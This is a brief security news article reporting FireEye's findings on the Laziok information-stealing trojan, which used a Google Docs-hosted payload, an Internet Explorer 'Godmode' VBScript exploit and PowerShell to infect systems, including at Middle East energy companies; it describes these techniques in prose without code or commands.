By taking advantage of Google Docs and PowerShell, a Trojan called Laziok is looking to gather and steal more information, researchers said.
Laziok ended up discovered last year when attackers used the malware going after energy companies in the Middle East. Attackers exploited an old Windows vulnerability to drop the Trojan onto users’ systems.
Attackers found a way to bypass Google’s security checks and uploaded the malicious payload to Google Docs, said researchers at FireEye. The malware ended up uploaded in March and remained there until Google got the notification from FireEye.
“Users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning,” researchers said on a blog post. “After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.”
When users accessed the attack page from Internet Explorer, the malicious script kicked in and allowed attackers to use an exploitation method known as “Godmode,” which allows code written in VBScript to break the browser sandbox.
The malicious script then leveraged PowerShell to download the actual malware from Google Docs and execute it.
“PowerShell is also useful for bypassing antivirus software because it is able to inject payloads directly in memory,” FireEye researchers said in the blog.
Once it infects a device, Trojan.Laziok collects information about the system, including a list of installed antiviruses.